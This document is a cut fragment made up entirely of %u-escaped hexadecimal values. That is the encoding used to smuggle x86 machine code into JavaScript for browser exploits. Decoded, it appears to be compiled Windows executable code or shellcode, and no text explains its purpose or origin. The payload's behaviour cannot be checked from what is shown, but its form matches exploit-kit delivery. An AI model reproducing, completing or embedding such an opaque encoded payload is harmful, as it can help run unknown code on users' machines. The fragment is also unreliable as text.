3f%u0775%ue857%uf8ff%uffff%uc759%ufc45%ufffe%uffff%u1ee8%u0000%u5600%u1ae8%u001b%u5900%u8ae8%u0010%uc200%u0004%u758b%u6a08%ue80d%u19fa%u0000%uc359%u758b%u6a08%ue80c%u19ee%u0000%uc359%uff8b%u5756%u10be%u4082%u5600%u15ff%u8094%u0040%uc085%u0775%ue856%u0258%u0000%u8b59%u85f8%u0fff%u5e84%u0001%u8b00%u1c35%u4080%u6800%u825c%u0040%uff57%u68d6%u8250%u0040%ua357%uacb0%u0040%ud6ff%u4468%u4082%u5700%ub4a3%u40ac%uff00%u68d6%u823c%u0040%ua357%uacb8%u0040%ud6ff%u3d83%uacb0%u0040%u8b00%ua035%u4080%ua300%uacbc%u0040%u1674%u3d83%uacb4%u0040%u7400%u830d%ub83d%u40ac%u0000%u0474%uc085%u2475%u98a1%u4080%ua300%uacb4%u0040%ua4a1%u4080%uc700%ub005%u40ac%ue300%u402d%u8900%ub835%u40ac%ua300%uacbc%u0040%u15ff%u809c%u0040%u9ca3%u40a7%u8300%ufff8%u840f%u00cc%u0000%u35ff%uacb4%u0040%uff50%u85d6%u0fc0%ubb84%u0000%ue800%u048a%u0000%u35ff%uacb0%u0040%u13e8%ufffb%uffff%ub435%u40ac%ua300%uacb0%u0040%u03e8%ufffb%uffff%ub835%u40ac%ua300%uacb4%u0040%uf3e8%ufffa%uffff%ubc35%u40ac%ua300%uacb8%u0040%ue3e8%ufffa%u83ff%u10c4%ubca3%u40ac%ue800%u1830%u0000%uc085%u6574%ud768%u402f%uff00%ub035%u40ac%ue800%ufb3d%uffff%uff59%ua3d0%ua798%u0040%uf883%u74ff%u6848%u0214%u0000%u016a%u85e8%u001a%u8b00%u59f0%u8559%u74f6%u5634%u35ff%ua798%u0040%u35ff%uacb8%u0040%u0ae8%ufffb%u59ff%ud0ff%uc085%u1b74%u006a%ue856%ufbe7%uffff%u5959%u15ff%u80ac%u0040%u4e83%uff04%u0689%uc033%ueb40%ue807%ufb92%uffff%uc033%u5e5f%uccc3%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%u548b%u0424%u4c8b%u0824%uc2f7%u0003%u0000%u3c75%u028b%u013a%u2e75%uc00a%u2674%u613a%u7501%u0a25%u74e4%uc11d%u10e8%u413a%u7502%u0a19%u74c0%u3a11%u0361%u1075%uc183%u8304%u04c2%ue40a%ud275%uff8b%uc033%u90c3%uc01b%ue0d1%uc083%uc301%uc2f7%u0001%u0000%u1874%u028a%uc283%u3a01%u7501%u83e7%u01c1%uc00a%udc74%uc2f7%u0002%u0000%ua474%u8b66%u8302%u02c2%u013a%uce75%uc00a%uc674%u613a%u7501%u0ac5%u74e4%u83bd%u02c1%u88eb%uff8b%u8b55%u8bec%u0845%u008b%u3881%u7363%ue06d%u2a75%u7883%u0310%u2475%u408b%u3d14%u0520%u1993%u1574%u213d%u9305%u7419%u3d0e%u0522%u1993%u0774%u003d%u9940%u7501%ue805%u216c%u0000%uc033%uc25d%u0004%u2868%u4033%uff00%u7815%u4080%u3300%uc3c0%uff8b%u8b55%u57ec%ue8bf%u0003%u5700%u15ff%u803c%u0040%u75ff%uff08%u9415%u4080%u8100%ue8c7%u0003%u8100%u60ff%u00ea%u7700%u8504%u74c0%u5fde%uc35d%uff8b%u8b55%ue8ec%u04a9%u0000%u75ff%ue808%u02f6%u0000%u35ff%ua7a0%u0040%uace8%ufff9%u68ff%u00ff%u0000%ud0ff%uc483%u5d0c%u8bc3%u55ff%uec8b%u7868%u4082%uff00%u9415%u4080%u8500%u74c0%u6815%u8268%u0040%uff50%u1c15%u4080%u8500%u74c0%uff05%u0875%ud0ff%uc35d%uff8b%u8b55%uffec%u0875%uc8e8%uffff%u59ff%u75ff%uff08%u4c15%u4080%ucc00%u086a%ub1e8%u0017%u5900%u6ac3%ue808%u16ce%u0000%uc359%uff8b%u8b55%u56ec%uf08b%u0beb%u068b%uc085%u0274%ud0ff%uc683%u3b04%u0875%uf072%u5d5e%u8bc3%u55ff%uec8b%u8b56%u0875%uc033%u0feb%uc085%u1075%u0e8b%uc985%u0274%ud1ff%uc683%u3b04%u0c75%uec72%u5d5e%u8bc3%u55ff%uec8b%u3d83%ub7f0%u0040%u7400%u6819%ub7f0%u0040%u91e8%u0022%u5900%uc085%u0a74%u75ff%uff08%uf015%u40b7%u5900%uc5e8%u0021%u6800%u8168%u0040%u5468%u4081%ue800%uffa1%uffff%u5959%uc085%u4275%ud968%u4040%ue800%u218f%u0000%u4cb8%u4081%uc700%u2404%u8150%u0040%u63e8%uffff%u83ff%uf43d%u40b7%u0000%u7459%u681b%ub7f4%u0040%u39e8%u0022%u5900%uc085%u0c74%u006a%u026a%u006a%u15ff%ub7f4%u0040%uc033%uc35d%u186a%u3068%u4096%ue800%u0c38%u0000%u086a%ucde8%u0016%u5900%u6583%u00fc%udb33%u3943%uf01d%u40ac%u0f00%uc584%u0000%u8900%uec1d%u40ac%u8a00%u1045%ue8a2%u40ac%u8300%u0c7d%u0f00%u9d85%u0000%uff00%ue835%u40b7%ue800%uf83b%uffff%u8b59%u89f8%ud87d%uff85%u7874%u35ff%ub7e4%u0040%u26e8%ufff8%u59ff%uf08b%u7589%u89dc%ue47d%u7589%u83e0%u04ee%u7589%u3bdc%u72f7%ue857%uf802%uffff%u0639%ued74%uf73b%u4a72%u36ff%ufce8%ufff7%u8bff%ue8f8%uf7ec%uffff%u0689%ud7ff%u35ff%ub7e8%u0040%ue6e8%ufff7%u8bff%ufff8%ue435%u40b7%ue800%uf7d9%uffff%uc483%u390c%ue47d%u0575%u4539%u74e0%u890e%ue47d%u7d89%u89d8%ue045%uf08b%u7589%u8bdc%ud87d%u9feb%u7068%u4081%ub800%u816c%u0040%u5fe8%ufffe%u59ff%u7868%u4081%ub800%u8174%u0040%u4fe8%ufffe%u59ff%u45c7%ufefc%uffff%ue8ff%u001f%u0000%u7d83%u0010%u2875%u1d89%uacf0%u0040%u086a%ufbe8%u0014%u5900%u75ff%ue808%ufdfc%uffff%udb33%u8343%u107d%u7400%u6a08%ue808%u14e2%u0000%uc359%u5ee8%u000b%uc300%uff8b%u8b55%u6aec%u6a00%uff00%u0875%uc3e8%ufffe%u83ff%u0cc4%uc35d%uff8b%u8b55%u6aec%u6a00%uff01%u0875%uade8%ufffe%u83ff%u0cc4%uc35d%u016a%u006a%u006a%u9de8%ufffe%u83ff%u0cc4%u6ac3%u6a01%u6a01%ue800%ufe8e%uffff%uc483%uc30c%uff8b%ue856%uf6fe%uffff%uf08b%ue856%u23fa%u0000%ue856%u2385%u0000%ue856%ue9eb%uffff%ue856%u236a%u0000%ue856%u2355%u0000%ue856%u213d%u0000%ue856%u01fe%u0000%ue856%u1e6d%u0000%u2e68%u4036%ue800%uf650%uffff%uc483%ua324%ua7a0%u0040%uc35e%uff8b%u8b55%u51ec%u5351%u5d8b%u5608%u3357%u33f6%u89ff%ufc7d%u1c3b%ua8fd%u40a7%u7400%u4709%u7d89%u83fc%u17ff%uee72%uff83%u0f17%u7783%u0001%u6a00%ue803%u2526%u0000%u8359%u01f8%u840f%u0134%u0000%u036a%u15e8%u0025%u5900%uc085%u0d75%u3d83%ua000%u0040%u0f01%u1b84%u0001%u8100%ufcfb%u0000%u0f00%u4184%u0001%u6800%u8838%u0040%u14bb%u0003%u5300%uf8bf%u40ac%u5700%ufbe8%u0018%u8300%u0cc4%uc085%u0d74%u5656%u5656%ue856%ue93c%uffff%uc483%u6814%u0104%u0000%u11be%u40ad%u5600%u006a%u05c6%uae15%u0040%uff00%u2415%u4080%u8500%u75c0%u6826%u8820%u0040%ufb68%u0002%u5600%ub9e8%u0018%u8300%u0cc4%uc085%u0f74%uc033%u5050%u5050%ue850%ue8f8%uffff%uc483%u5614%u77e8%u001c%u4000%u8359%u3cf8%u3876%ue856%u1c6a%u0000%uee83%u033b%u6ac6%ub903%ub00c%u0040%u1c68%u4088%u2b00%u51c8%ue850%ue4ba%uffff%uc483%u8514%u74c0%u3311%u56f6%u5656%u5656%ub5e8%uffe8%u83ff%u14c4%u02eb%uf633%u1868%u4088%u5300%ue857%ue420%uffff%uc483%u850c%u74c0%u560d%u5656%u5656%u91e8%uffe8%u83ff%u14c4%u458b%ufffc%uc534%ua7ac%u0040%u5753%ufbe8%uffe3%u83ff%u0cc4%uc085%u0d74%u5656%u5656%ue856%ue86c%uffff%uc483%u6814%u2010%u0001%uf068%u4087%u5700%u84e8%u0022%u8300%u0cc4%u32eb%uf46a%u15ff%u80b4%u0040%ud88b%ude3b%u2474%ufb83%u74ff%u6a1f%u8d00%uf845%u8d50%ufd34%ua7ac%u0040%u36ff%ub5e8%u001b%u5900%uff50%u5336%u15ff%u80b0%u0040%u5e5f%uc95b%u6ac3%ue803%u23aa%u0000%u8359%u01f8%u1574%u036a%u9de8%u0023%u5900%uc085%u1f75%u3d83%ua000%u0040%u7501%u6816%u00fc%u0000%u29e8%ufffe%u68ff%u00ff%u0000%u1fe8%ufffe%u59ff%uc359%u8bc3%u55ff%uec8b%u5151%ue856%uf6a2%uffff%uf08b%uf685%u840f%u0146%u0000%u568b%ua15c%ua86c%u0040%u8b57%u087d%uca8b%u3953%u7439%u8b0e%u6bd8%u0cdb%uc183%u030c%u3bda%u72cb%u6bee%u0cc0%uc203%uc83b%u0873%u3939%u0475%uc18b%u02eb%uc033%uc085%u0a74%u588b%u8908%ufc5d%udb85%u0775%uc033%ufbe9%u0000%u8300%u05fb%u0c75%u6083%u0008%uc033%ue940%u00ea%u0000%ufb83%u0f01%ude84%u0000%u8b00%u604e%u4d89%u8bf8%u0c4d%u4e89%u8b60%u0448%uf983%u0f08%ub885%u0000%u8b00%u600d%u40a8%u8b00%u643d%u40a8%u8b00%u03d1%u3bf9%u7dd7%u6b24%u0cc9%u7e8b%u835c%u3964%u0008%u3d8b%ua860%u0040%u1d8b%ua864%u0040%u0342%u83df%u0cc1%ud33b%ue27c%u5d8b%u8bfc%u8b00%u647e%u8e3d%u0000%u75c0%uc709%u6446%u0083%u0000%u5eeb%u903d%u0000%u75c0%uc709%u6446%u0081%u0000%u4eeb%u913d%u0000%u75c0%uc709%u6446%u0084%u0000%u3eeb%u933d%u0000%u75c0%uc709%u6446%u0085%u0000%u2eeb%u8d3d%u0000%u75c0%uc709%u6446%u0082%u0000%u1eeb%u8f3d%u0000%u75c0%uc709%u6446%u0086%u0000%u0eeb%u923d%u0000%u75c0%uc707%u6446%u008a%u0000%u76ff%u6a64%uff08%u59d3%u7e89%ueb64%u8307%u0860%u5100%ud3ff%u458b%u59f8%u4689%u8360%uffc8%u5f5b%uc95e%u83c3%uec3d%u40b7%u0000%u0575%ub0e8%uffef%u56ff%u358b%uac60%u0040%u3357%u85ff%u75f6%u8318%uffc8%ua0e9%u0000%u3c00%u743d%u4701%ue856%u19dc%u0000%u8d59%u0674%u8a01%u8406%u75c0%u6aea%u4704%ue857%u129a%u0000%uf88b%u5959%u3d89%uacd0%u0040%uff85%ucb74%u358b%uac60%u0040%ueb53%u5642%uabe8%u0019%u8b00%u43d8%u3e80%u593d%u3174%u016a%ue853%u126c%u0000%u5959%u0789%uc085%u4e74%u5356%ue850%u15b0%u0000%uc483%u850c%u74c0%u330f%u50c0%u5050%u5050%uefe8%uffe5%u83ff%u14c4%uc783%u0304%u80f3%u003e%ub975%u35ff%uac60%u0040%u5ee8%u0011%u8300%u6025%u40ac%u0000%u2783%uc700%ue005%u40b7%u0100%u0000%u3300%u59c0%u5f5b%uc35e%u35ff%uacd0%u0040%u38e8%u0011%u8300%ud025%u40ac%u0000%uc883%uebff%u8be4%u55ff%uec8b%u8b51%u104d%u3353%u56c0%u0789%uf28b%u558b%uc70c%u0101%u0000%u3900%u0845%u0974%u5d8b%u8308%u0845%u8904%u8913%ufc45%u3e80%u7522%u3310%u39c0%ufc45%u22b3%u940f%u46c0%u4589%uebfc%uff3c%u8507%u74d2%u8a08%u8806%u4202%u5589%u8a0c%u0f1e%uc3b6%u4650%u7de8%u0021%u5900%uc085%u1374%u07ff%u7d83%u000c%u0a74%u4d8b%u8a0c%uff06%u0c45%u0188%u8b46%u0c55%u4d8b%u8410%u74db%u8332%ufc7d%u7500%u80a9%u20fb%u0574%ufb80%u7509%u859f%u74d2%uc604%uff42%u8300%ufc65%u8000%u003e%u840f%u00e9%u0000%u068a%u203c%u0474%u093c%u0675%ueb46%u4ef3%ue3eb%u3e80%u0f00%ud084%u0000%u8300%u087d%u7400%u8b09%u0845%u4583%u0408%u1089%u01ff%udb33%u3343%uebc9%u4602%u8041%u5c3e%uf974%u3e80%u7522%uf626%u01c1%u1f75%u7d83%u00fc%u0c74%u468d%u8001%u2238%u0475%uf08b%u0deb%uc033%udb33%u4539%u0ffc%uc094%u4589%ud1fc%u85e9%u74c9%u4912%ud285%u0474%u02c6%u425c%u07ff%uc985%uf175%u5589%u8a0c%u8406%u74c0%u8355%ufc7d%u7500%u3c08%u7420%u3c4b%u7409%u8547%u74db%u0f3d%uc0be%u8550%u74d2%ue823%u2098%u0000%u8559%u74c0%u8a0d%u8b06%u0c4d%u45ff%u880c%u4601%u07ff%u4d8b%u8a0c%uff06%u0c45%u0188%u0deb%u75e8%u0020%u5900%uc085%u0374%uff46%uff07%u8b07%u0c55%ue946%uff56%uffff%ud285%u0774%u02c6%u4200%u5589%uff0c%u8b07%u104d%u0ee9%uffff%u8bff%u0845%u5b5e%uc085%u0374%u2083%uff00%uc901%u8bc3%u55ff%uec8b%uec83%u530c%udb33%u5756%u1d39%ub7ec%u0040%u0575%u2ce8%uffed%u68ff%u0104%u0000%u10be%u40b0%u5600%u8853%u141d%u40b1%uff00%u2415%u4080%ua100%ub7f8%u0040%u3589%uace0%u0040%uc33b%u0774%u4589%u38fc%u7518%u8903%ufc75%u558b%u8dfc%uf845%u5350%u8d53%uf47d%u0ae8%ufffe%u8bff%uf845%uc483%u3d0c%uffff%u3fff%u4a73%u4d8b%u83f4%ufff9%u4273%uf88b%ue7c1%u8d02%u0f04%uc13b%u3672%ue850%u0f9d%u0000%uf08b%u3b59%u74f3%u8b29%ufc55%u458d%u50f8%ufe03%u5657%u7d8d%ue8f4%ufdc9%uffff%u458b%u83f8%u0cc4%ua348%uacc4%u0040%u3589%uacc8%u0040%uc033%u03eb%uc883%u5fff%u5b5e%uc3c9%uff8b%u8b55%ua1ec%ub118%u0040%uec83%u530c%u8b56%uc835%u4080%u5700%udb33%uff33%uc33b%u2e75%ud6ff%uf88b%ufb3b%u0c74%u05c7%ub118%u0040%u0001%u0000%u23eb%u15ff%u8018%u0040%uf883%u7578%u6a0a%u5802%u18a3%u40b1%ueb00%ua105%ub118%u0040%uf883%u0f01%u8185%u0000%u3b00%u75fb%uff0f%u8bd6%u3bf8%u75fb%u3307%ue9c0%u00ca%u0000%uc78b%u3966%u741f%u400e%u6640%u1839%uf975%u4040%u3966%u7518%u8bf2%uc435%u4080%u5300%u5353%uc72b%ud153%u40f8%u5750%u5353%u4589%ufff4%u89d6%uf845%uc33b%u2f74%ue850%u0ec3%u0000%u8959%ufc45%uc33b%u2174%u5353%u75ff%u50f8%u75ff%u57f4%u5353%ud6ff%uc085%u0c75%u75ff%ue8fc%u0e13%u0000%u8959%ufc5d%u5d8b%u57fc%u15ff%u80c0%u0040%uc38b%u5ceb%uf883%u7402%u3b04%u75c3%uff82%ubc15%u4080%u8b00%u3bf0%u0ff3%u7284%uffff%u38ff%u741e%u400a%u1838%ufb75%u3840%u7518%u2bf6%u40c6%u8950%uf845%u5ce8%u000e%u8b00%u59f8%ufb3b%u0c75%uff56%ub815%u4080%ue900%uff45%uffff%u75ff%u56f8%ue857%u1242%u0000%uc483%u560c%u15ff%u80b8%u0040%uc78b%u5e5f%uc95b%u6ac3%u6854%u9650%u0040%uc5e8%u0002%u3300%u89ff%ufc7d%u458d%u509c%u15ff%u80d4%u0040%u45c7%ufefc%uffff%u6aff%u6a40%u5e20%ue856%u0e46%u0000%u5959%uc73b%u840f%u0214%u0000%ue0a3%u40b6%u8900%ud835%u40b6%u8d00%u0088%u0008%ueb00%uc630%u0440%u8300%uff08%u40c6%u0a05%u7889%uc608%u2440%uc600%u2540%uc60a%u2640%u890a%u3878%u40c6%u0034%uc083%u8b40%ue00d%u40b6%u8100%u00c1%u0008%u3b00%u72c1%u66cc%u7d39%u0fce%u0a84%u0001%u8b00%ud045%uc73b%u840f%u00ff%u0000%u388b%u588d%u8d04%u3b04%u4589%ubee4%u0800%u0000%ufe3b%u027c%ufe8b%u45c7%u01e0%u0000%ueb00%u6a5b%u6a40%ue820%u0db8%u0000%u5959%uc085%u5674%u4d8b%u8de0%u8d0c%ub6e0%u0040%u0189%u0583%ub6d8%u0040%u8d20%u0090%u0008%ueb00%uc62a%u0440%u8300%uff08%u40c6%u0a05%u6083%u0008%u6080%u8024%u40c6%u0a25%u40c6%u0a26%u6083%u0038%u40c6%u0034%uc083%u8b40%u0311%u3bd6%u72c2%uffd2%ue045%u3d39%ub6d8%u0040%u9d7c%u06eb%u3d8b%ub6d8%u0040%u6583%u00e0%uff85%u6d7e%u458b%u8be4%u8308%ufff9%u5674%uf983%u74fe%u8a51%ua803%u7401%ua84b%u7508%u510b%u15ff%u80d0%u0040%uc085%u3c74%u758b%u8be0%uc1c6%u05f8%ue683%uc11f%u06e6%u3403%ue085%u40b6%u8b00%ue445%u008b%u0689%u038a%u4688%u6804%u0fa0%u0000%u468d%u500c%u35e8%u001a%u5900%u8559%u0fc0%uc984%u0000%uff00%u0846%u45ff%u43e0%u4583%u04e4%u7d39%u7ce0%u3393%u8bdb%uc1f3%u06e6%u3503%ub6e0%u0040%u068b%uf883%u74ff%u830b%ufef8%u0674%u4e80%u8004%u72eb%u46c6%u8104%udb85%u0575%uf66a%ueb58%u8b0a%u48c3%ud8f7%uc01b%uc083%u50f5%u15ff%u80b4%u0040%uf88b%uff83%u74ff%u8543%u74ff%u573f%u15ff%u80d0%u0040%uc085%u3474%u3e89%uff25%u0000%u8300%u02f8%u0675%u4e80%u4004%u09eb%uf883%u7503%u8004%u044e%u6808%u0fa0%u0000%u468d%u500c%u9fe8%u0019%u5900%u8559%u74c0%uff37%u0846%u0aeb%u4e80%u4004%u06c7%ufffe%uffff%u8343%u03fb%u8c0f%uff67%uffff%u35ff%ub6d8%u0040%u15ff%u80cc%u0040%uc033%u11eb%uc033%uc340%u658b%uc7e8%ufc45%ufffe%uffff%uc883%ue8ff%u00c3%u0000%u8bc3%u56ff%u50b8%u4095%ube00%u9550%u0040%u8b57%u3bf8%u73c6%u8b0f%u8507%u74c0%uff02%u83d0%u04c7%ufe3b%uf172%u5e5f%u8bc3%u56ff%u58b8%u4095%ube00%u9558%u0040%u8b57%u3bf8%u73c6%u8b0f%u8507%u74c0%uff02%u83d0%u04c7%ufe3b%uf172%u5e5f%u8bc3%u55ff%uec8b%uc033%u4539%u6a08%u0f00%uc094%u0068%u0010%u5000%u15ff%u80dc%u0040%u1ca3%u40b1%u8500%u75c0%u5d02%u33c3%u40c0%ud4a3%u40b6%u5d00%uccc3%u9068%u4041%u6400%u35ff%u0000%u0000%u448b%u1024%u6c89%u1024%u6c8d%u1024%ue02b%u5653%ua157%ua8b4%u0040%u4531%u33fc%u50c5%u6589%uffe8%uf875%u458b%uc7fc%ufc45%ufffe%uffff%u4589%u8df8%uf045%ua364%u0000%u0000%u8bc3%uf04d%u8964%u000d%u0000%u5900%u5f5f%u5b5e%ue58b%u515d%uccc3%ucccc%ucccc%ucccc%uff8b%u8b55%u83ec%u18ec%u8b53%u0c5d%u8b56%u0873%u3533%ua8b4%u0040%u8b57%uc606%uff45%uc700%uf445%u0001%u0000%u7b8d%u8310%ufef8%u0d74%u4e8b%u0304%u33cf%u380c%uf1e8%u0001%u8b00%u0c4e%u468b%u0308%u33cf%u380c%ue1e8%u0001%u8b00%u0845%u40f6%u6604%u850f%u0116%u0000%u4d8b%u8d10%ue855%u5389%u8bfc%u0c5b%u4589%u89e8%uec4d%ufb83%u74fe%u8d5f%u0049%u048d%u8b5b%u864c%u8d14%u8644%u8910%uf045%u008b%u4589%u85f8%u74c9%u8b14%ue8d7%u265c%u0000%u45c6%u01ff%uc085%u407c%u477f%u458b%u8bf8%u83d8%ufef8%uce75%u7d80%u00ff%u2474%u068b%uf883%u74fe%u8b0d%u044e%ucf03%u0c33%ue838%u016e%u0000%u4e8b%u8b0c%u0856%ucf03%u0c33%ue83a%u015e%u0000%u458b%u5ff4%u5b5e%ue58b%uc35d%u45c7%u00f4%u0000%ueb00%u8bc9%u084d%u3981%u7363%ue06d%u2975%u3d83%ub6d0%u0040%u7400%u6820%ub6d0%u0040%u83e8%u0014%u8300%u04c4%uc085%u0f74%u558b%u6a08%u5201%u15ff%ub6d0%u0040%uc483%u8b08%u0c4d%uffe8%u0025%u8b00%u0c45%u5839%u740c%u6812%ua8b4%u0040%u8b57%u8bd3%ue8c8%u2602%u0000%u458b%u8b0c%uf84d%u4889%u8b0c%u8306%ufef8%u0d74%u4e8b%u0304%u33cf%u380c%udbe8%u0000%u8b00%u0c4e%u568b%u0308%u33cf%u3a0c%ucbe8%u0000%u8b00%uf045%u488b%u8b08%ue8d7%u2595%u0000%ufeba%uffff%u39ff%u0c53%u840f%uff52%uffff%ub468%u40a8%u5700%ucb8b%uade8%u0025%ue900%uff1c%uffff%uff8b%u8b55%u83ec%u10ec%ub4a1%u40a8%u8300%uf865%u8300%ufc65%u5300%ubf57%ue64e%ubb40%u00bb%uff00%u3bff%u74c7%u850d%u74c3%uf709%ua3d0%ua8b8%u0040%u60eb%u8d56%uf845%uff50%uf415%u4080%u8b00%ufc75%u7533%ufff8%uf015%u4080%u3300%ufff0%uac15%u4080%u3300%ufff0%uec15%u4080%u3300%u8df0%uf045%uff50%ue815%u4080%u8b00%uf445%u4533%u33f0%u3bf0%u75f7%ube07%ue64f%ubb40%u0beb%uf385%u0775%uc68b%ue0c1%u0b10%u89f0%ub435%u40a8%uf700%u89d6%ub835%u40a8%u5e00%u5b5f%uc3c9%u2583%ub6cc%u0040%uc300%u0d3b%ua8b4%u0040%u0275%uc3f3%u12e9%u0025%ucc00%ucccc%ucccc%ucccc%u548b%u0c24%u4c8b%u0424%ud285%u6974%uc033%u448a%u0824%uc084%u1675%ufa81%u0100%u0000%u0e72%u3d83%ub6b0%u0040%u7400%ue905%u263c%u0000%u8b57%u83f9%u04fa%u3172%ud9f7%ue183%u7403%u2b0c%u88d1%u8307%u01c7%ue983%u7501%u8bf6%uc1c8%u08e0%uc103%uc88b%ue0c1%u0310%u8bc1%u83ca%u03e2%ue9c1%u7402%uf306%u85ab%u74d2%u880a%u8307%u01c7%uea83%u7501%u8bf6%u2444%u5f08%u8bc3%u2444%uc304%uff8b%u8b55%u8bec%u0845%uc085%u1274%ue883%u8108%udd38%u00dd%u7500%u5007%u98e8%u0007%u5900%uc35d%uff8b%u8b55%u83ec%u14ec%ub4a1%u40a8%u3300%u89c5%ufc45%u5653%udb33%u8b57%u39f1%u201d%u40b1%u7500%u5338%u3353%u47ff%u6857%u88d0%u0040%u0068%u0001%u5300%u15ff%u8100%u0040%uc085%u0874%u3d89%ub120%u0040%u15eb%u15ff%u8018%u0040%uf883%u7578%uc70a%u2005%u40b1%u0200%u0000%u3900%u145d%u227e%u4d8b%u8b14%u1045%u3849%u7418%u4008%ucb3b%uf675%uc983%u8bff%u1445%uc12b%u3b48%u1445%u017d%u8940%u1445%u20a1%u40b1%u8300%u02f8%u840f%u01ac%u0000%uc33b%u840f%u01a4%u0000%uf883%u0f01%ucc85%u0001%u8900%uf85d%u5d39%u7520%u8b08%u8b06%u0440%u4589%u8b20%ufc35%u4080%u3300%u39c0%u245d%u5353%u75ff%u0f14%uc095%u75ff%u8d10%uc504%u0001%u0000%uff50%u2075%ud6ff%uf88b%ufb3b%u840f%u018f%u0000%u437e%ue06a%ud233%uf758%u83f7%u02f8%u3772%u448d%u083f%u003d%u0004%u7700%ue813%u293c%u0000%uc48b%uc33b%u1c74%u00c7%ucccc%u0000%u11eb%ue850%u285a%u0000%u3b59%u74c3%uc709%udd00%u00dd%u8300%u08c0%u4589%uebf4%u8903%uf45d%u5d39%u0ff4%u3e84%u0001%u5700%u75ff%ufff4%u1475%u75ff%u6a10%uff01%u2075%ud6ff%uc085%u840f%u00e3%u0000%u358b%u8100%u0040%u5353%uff57%uf475%u75ff%uff0c%u0875%ud6ff%uc88b%u4d89%u3bf8%u0fcb%uc284%u0000%uf700%u0c45%u0400%u0000%u2974%u5d39%u0f1c%ub084%u0000%u3b00%u1c4d%u8f0f%u00a7%u0000%u75ff%uff1c%u1875%uff57%uf475%u75ff%uff0c%u0875%ud6ff%u90e9%u0000%u3b00%u7ecb%u6a45%u33e0%u58d2%uf1f7%uf883%u7202%u8d39%u0944%u3d08%u0400%u0000%u1677%u7de8%u0028%u8b00%u3bf4%u74f3%uc76a%ucc06%u00cc%u8300%u08c6%u1aeb%ue850%u2798%u0000%u3b59%u74c3%uc709%udd00%u00dd%u8300%u08c0%uf08b%u02eb%uf633%uf33b%u4174%u75ff%u56f8%uff57%uf475%u75ff%uff0c%u0875%u15ff%u8100%u0040%uc085%u2274%u5353%u5d39%u751c%u5304%ueb53%uff06%u1c75%u75ff%uff18%uf875%u5356%u75ff%uff20%uc415%u4080%u8900%uf845%ue856%ufdb8%uffff%uff59%uf475%uafe8%ufffd%u8bff%uf845%ue959%u0159%u0000%u5d89%u89f4%uf05d%u5d39%u7508%u8b08%u8b06%u1440%u4589%u3908%u205d%u0875%u068b%u408b%u8904%u2045%u75ff%ue808%u24ba%u0000%u8959%uec45%uf883%u75ff%u3307%ue9c0%u0121%u0000%u453b%u0f20%udb84%u0000%u5300%u8d53%u144d%uff51%u1075%uff50%u2075%ud8e8%u0024%u8300%u18c4%u4589%u3bf4%u74c3%u8bd4%uf835%u4080%u5300%uff53%u1475%uff50%u0c75%u75ff%uff08%u89d6%uf845%uc33b%u0775%uf633%ub7e9%u0000%u7e00%u833d%ue0f8%u3877%uc083%u3d08%u0400%u0000%u1677%u67e8%u0027%u8b00%u3bfc%u74fb%uc7dd%ucc07%u00cc%u8300%u08c7%u1aeb%ue850%u2682%u0000%u3b59%u74c3%uc709%udd00%u00dd%u8300%u08c0%uf88b%u02eb%uff33%ufb3b%ub474%u75ff%u53f8%ue857%ufc5e%uffff%uc483%uff0c%uf875%uff57%u1475%u75ff%ufff4%u0c75%u75ff%uff08%u89d6%uf845%uc33b%u0475%uf633%u25eb%u75ff%u8d1c%uf845%u75ff%u5018%uff57%u2075%u75ff%ue8ec%u2427%u0000%uf08b%u7589%u83f0%u18c4%udef7%uf61b%u7523%u57f8%u8de8%ufffc%u59ff%u1aeb%u75ff%uff1c%u1875%u75ff%uff14%u1075%u75ff%uff0c%u0875%u15ff%u80f8%u0040%uf08b%u5d39%u74f4%uff09%uf475%u18e8%u0004%u5900%u458b%u3bf0%u74c3%u390c%u1845%u0774%ue850%u0405%u0000%u8b59%u8dc6%ue065%u5e5f%u8b5b%ufc4d%ucd33%uade8%ufffb%uc9ff%u8bc3%u55ff%uec8b%uec83%uff10%u0875%u4d8d%ue8f0%ud4fd%uffff%u75ff%u8d28%uf04d%u75ff%uff24%u2075%u75ff%uff1c%u1875%u75ff%uff14%u1075%u75ff%ue80c%ufc28%uffff%uc483%u8020%ufc7d%u7400%u8b07%uf84d%u6183%ufd70%uc3c9%uff8b%u8b55%u51ec%ua151%ua8b4%u0040%uc533%u4589%ua1fc%ub124%u0040%u5653%udb33%u8b57%u3bf9%u75c3%u8d3a%uf845%u3350%u46f6%u6856%u88d0%u0040%uff56%u0815%u4081%u8500%u74c0%u8908%u2435%u40b1%ueb00%uff34%u1815%u4080%u8300%u78f8%u0a75%u026a%ua358%ub124%u0040%u05eb%u24a1%u40b1%u8300%u02f8%u840f%u00cf%u0000%uc33b%u840f%u00c7%u0000%uf883%u0f01%ue885%u0000%u8900%uf85d%u5d39%u7518%u8b08%u8b07%u0440%u4589%u8b18%ufc35%u4080%u3300%u39c0%u205d%u5353%u75ff%u0f10%uc095%u75ff%u8d0c%uc504%u0001%u0000%uff50%u1875%ud6ff%uf88b%ufb3b%u840f%u00ab%u0000%u3c7e%uff81%ufff0%u7fff%u3477%u448d%u083f%u003d%u0004%u7700%ue813%u2580%u0000%uc48b%uc33b%u1c74%u00c7%ucccc%u0000%u11eb%ue850%u249e%u0000%u3b59%u74c3%uc709%udd00%u00dd%u8300%u08c0%ud88b%udb85%u6974%u048d%u503f%u006a%ue853%ufa7c%uffff%uc483%u570c%uff53%u1075%u75ff%u6a0c%uff01%u1875%ud6ff%uc085%u1174%u75ff%u5014%uff53%u0875%u15ff%u8108%u0040%u4589%u53f8%uc9e8%ufffa%u8bff%uf845%ueb59%u3375%u39f6%u1c5d%u0875%u078b%u408b%u8914%u1c45%u5d39%u7518%u8b08%u8b07%u0440%u4589%uff18%u1c75%udbe8%u0021%u5900%uf883%u75ff%u3304%uebc0%u3b47%u1845%u1e74%u5353%u4d8d%u5110%u75ff%u500c%u75ff%ue818%u2203%u0000%uf08b%uc483%u3b18%u74f3%u89dc%u0c75%u75ff%uff14%u1075%u75ff%uff0c%u0875%u75ff%uff1c%u0415%u4081%u8b00%u3bf8%u74f3%u5607%u06e8%u0002%u5900%uc78b%u658d%u5fec%u5b5e%u4d8b%u33fc%ue8cd%uf9ae%uffff%uc3c9%uff8b%u8b55%u83ec%u10ec%u75ff%u8d08%uf04d%ufee8%uffd2%uffff%u2475%u4d8d%ufff0%u2075%u75ff%uff1c%u1875%u75ff%uff14%u1075%u75ff%ue80c%ufe16%uffff%uc483%u801c%ufc7d%u7400%u8b07%uf84d%u6183%ufd70%uc3c9%uff8b%u5756%uf633%u28bf%u40b1%u8300%uf53c